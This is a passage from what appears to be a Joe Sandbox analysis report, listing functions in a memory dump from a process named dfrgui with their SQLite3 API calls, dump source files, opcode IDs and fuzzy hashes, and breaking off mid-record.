                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                              • String ID:
                                                                                              • API String ID: 4226599549-0
                                                                                              • Opcode ID: 812d07d9ffdc0142b3f055340a06c817b9fb6102bd29dc3d07d8cc26d0b0171b
                                                                                              • Instruction ID: 2f487907c559b38c155134f1e76fbd5b547cbfdf323574b3e9c07f517c933560
                                                                                              • Opcode Fuzzy Hash: 812d07d9ffdc0142b3f055340a06c817b9fb6102bd29dc3d07d8cc26d0b0171b
                                                                                              • Instruction Fuzzy Hash: BB212A75904786CBCB10DFA9C59059EBBF1BF89214F20CA2DE8A897394E734D841CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3B368 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B37F
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B3AE
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B3C3
                                                                                              • sqlite3_load_extension.SQLITE3 ref: 61E3B3DE
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B3F9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B404
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                              • String ID:
                                                                                              • API String ID: 356667613-0
                                                                                              • Opcode ID: 59fd11023c358aa7b7423dbfaff7a8eae9ddc03d95e01c71eda2a1058f075d76
                                                                                              • Instruction ID: ba843798ccaabf1b70d79c8ede2eca779a9ff5c90759cf791d1dee651b3eff40
                                                                                              • Opcode Fuzzy Hash: 59fd11023c358aa7b7423dbfaff7a8eae9ddc03d95e01c71eda2a1058f075d76
                                                                                              • Instruction Fuzzy Hash: C311E4B4D087569BC700AF69C48455EFBF5AFC9264F21CA5DE8A887350E334D841CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E0EF99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strglob
                                                                                              • String ID: $
                                                                                              • API String ID: 476814121-227171996
                                                                                              • Opcode ID: 33820386dec3e326c2617a32b3c3b0025bd204f8290915e3dd00a17aae7a7805
                                                                                              • Instruction ID: 9d3e1207c980ed52d915300f8809f88af37aa68daf4c5c017b94f7ece096e1ef
                                                                                              • Opcode Fuzzy Hash: 33820386dec3e326c2617a32b3c3b0025bd204f8290915e3dd00a17aae7a7805
                                                                                              • Instruction Fuzzy Hash: 102128615083924ADB218FBAC98034ABEF4BF4631AF34C4ADD5D58B295E378E4A1C747
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1999A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E199B4
                                                                                                • Part of subcall function 61E19649: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E192D3,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19651
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E199FC
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E19A23
                                                                                              • sqlite3_free.SQLITE3 ref: 61E19A51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                              • String ID: ra
                                                                                              • API String ID: 2308590742-515669570
                                                                                              • Opcode ID: b95b27a2265ab1cddfdf34a9dfc9760ef71502481e580549df37e443259dadaf
                                                                                              • Instruction ID: eaaf0b97d9b811d5c3cbff90111693eb57aca262b88ce71591f4b19e893193bc
                                                                                              • Opcode Fuzzy Hash: b95b27a2265ab1cddfdf34a9dfc9760ef71502481e580549df37e443259dadaf
                                                                                              • Instruction Fuzzy Hash: 1321C67260C2418BEB018FA9958275B7BE6EFC6318F39C468DC984B309D775D84A8792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E93520 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: __dllonexit_lock_onexit_unlock
                                                                                              • String ID: ti
                                                                                              • API String ID: 209411981-2601316754
                                                                                              • Opcode ID: 736b2c633bc001e1a8ae71ef639aa89015edadd58898536a64f0c085db22f799
                                                                                              • Instruction ID: 985a3df0f090727277d594f949547fe837932f80f1f2155501a7ec836d8efe15
                                                                                              • Opcode Fuzzy Hash: 736b2c633bc001e1a8ae71ef639aa89015edadd58898536a64f0c085db22f799
                                                                                              • Instruction Fuzzy Hash: 161195B5919B428FCB50EF75C48451EFBE0AB99354F158D2EE4D48B340E734D4848B82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3B54D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B569
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B576
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B5A6
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B5BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_initializesqlite3_mprintfsqlite3_result_errorsqlite3_vmprintf
                                                                                              • String ID: after rename
                                                                                              • API String ID: 473106834-392022782
                                                                                              • Opcode ID: f2123a76cef1a4a69deae10863c91edc1ce96b7d3e58891d9762c6008c4da440
                                                                                              • Instruction ID: adede2551f90e0591c819948ee3daa26ec604fed3b177b1353099e6f756ff43d
                                                                                              • Opcode Fuzzy Hash: f2123a76cef1a4a69deae10863c91edc1ce96b7d3e58891d9762c6008c4da440
                                                                                              • Instruction Fuzzy Hash: 7B0108B59087159BC700EF69C48549EFBF6BFC8260F61C92EE8988B350E734C8418B92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1B1D6 Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B22E
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1B2CE
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B1F5
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B45D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mutex_enter
                                                                                              • String ID:
                                                                                              • API String ID: 3222813361-0
                                                                                              • Opcode ID: 4ecff7d9d455c795ecd04105dbdbf52fc599a0e92ef87759ee9e7e9a738b9f47
                                                                                              • Instruction ID: 9cd2706f91924b7e009fb00111979a7ac826af9421b746feedc3d15ac09a5aa9
                                                                                              • Opcode Fuzzy Hash: 4ecff7d9d455c795ecd04105dbdbf52fc599a0e92ef87759ee9e7e9a738b9f47
                                                                                              • Instruction Fuzzy Hash: F2A1BF75D05218CBDB04CFA9D484ADDBBF1BF88314F25C52AE858AB358E774A946CF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E05113 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strnicmp
                                                                                              • String ID:
                                                                                              • API String ID: 1961171630-0
                                                                                              • Opcode ID: 93009fa868e9b07ea392630c702db0edbb3daf21a3ee036e4a6b213cbe74e8d1
                                                                                              • Instruction ID: 49c5ded176830feb384116133c2a6b755fddcc36b3502f5c002099c47ac03b9f
                                                                                              • Opcode Fuzzy Hash: 93009fa868e9b07ea392630c702db0edbb3daf21a3ee036e4a6b213cbe74e8d1
                                                                                              • Instruction Fuzzy Hash: 2951166444834689EB204E9484823AABBF2AF4370FF78D50AE4A447355C3BFC4BBD613
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E49AF5 Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E49DA0), ref: 61E49B1E
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E49DA0), ref: 61E49CAB
                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E49DA0), ref: 61E49CBD
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49CD4
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49CDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                              • String ID:
                                                                                              • API String ID: 2921195555-0
                                                                                              • Opcode ID: d19dedab9cb5e6f11c54e1e51d91f6ae964ce5efce376d1f248536dfd4b7238e
                                                                                              • Instruction ID: 792a80c48487ec52687e807984b257154e637deec0cdc0557b6d80cb6cd94670
                                                                                              • Opcode Fuzzy Hash: d19dedab9cb5e6f11c54e1e51d91f6ae964ce5efce376d1f248536dfd4b7238e
                                                                                              • Instruction Fuzzy Hash: A6518C70A046028BDB10DF69D9C0649B7B0FF88318F25C96CDC99AF305C738E852CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3B411 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 4073198082-0
                                                                                              • Opcode ID: d6c22134a046c69aa067e8e4f4371d3fe0c75385b646ee908d42d66d9be81af1
                                                                                              • Instruction ID: 8fa6be03c7dba9889ae9520060d40073695be672e9dd452269ac1d368761de8d
                                                                                              • Opcode Fuzzy Hash: d6c22134a046c69aa067e8e4f4371d3fe0c75385b646ee908d42d66d9be81af1
                                                                                              • Instruction Fuzzy Hash: 424136B1A04625DFDB04CF64D48465ABBE2FF88314F24C469EC5A8F385E734E851CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E37D67 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_result_null.SQLITE3 ref: 61E37D89
                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E37DA8
                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E37E5D
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E37E91
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E37ECE
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E37F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                                                              • String ID:
                                                                                              • API String ID: 402655203-0
                                                                                              • Opcode ID: 409e3fb8d297a66fef37320e8562a33fe7adda16b435449ee7870a634a7c3f30
                                                                                              • Instruction ID: 09ddba835bcf15fbde6aa1b2efeba233e6b5c616b17edc70f301b9b60d68e0d7
                                                                                              • Opcode Fuzzy Hash: 409e3fb8d297a66fef37320e8562a33fe7adda16b435449ee7870a634a7c3f30
                                                                                              • Instruction Fuzzy Hash: 0D416A70D092A5DEDB109FADC194AADBBF1ABC9358F25C41EE4849B341C735D881DB22
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E499E3 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E13FAA: sqlite3_mutex_try.SQLITE3(?,?,?,61E1402A), ref: 61E13F4A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E49A47
                                                                                              • sqlite3_mutex_free.SQLITE3 ref: 61E49A88
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E49A98
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49AC7
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49AE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                              • String ID:
                                                                                              • API String ID: 1894464702-0
                                                                                              • Opcode ID: 6112742a624d4eaa717f268fcb4be937bb7e56b8546d4e67576ec64d333ddfe2
                                                                                              • Instruction ID: 5b27ad18fcb023b1d1ff9fd32e39f905edc900126d4f03650a5b99fe2b41fa34
                                                                                              • Opcode Fuzzy Hash: 6112742a624d4eaa717f268fcb4be937bb7e56b8546d4e67576ec64d333ddfe2
                                                                                              • Instruction Fuzzy Hash: B3313B34B046428BEB14DFAAD5C0A1A7BF6BFC9348B29C469D8449B315E734E8819B81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3B5D0 Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3B602
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B69E
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3B6AC
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B6CE
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E3B6E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_intsqlite3_vmprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1587739625-0
                                                                                              • Opcode ID: d762e509f5cb1270798c3d8b0ed4d09417eb475e6e46246839d711bae6bfec28
                                                                                              • Instruction ID: 05412b70bd6f85b6680fb51a4016b66afa1f036956eca5f0188ea7ea7b92be12
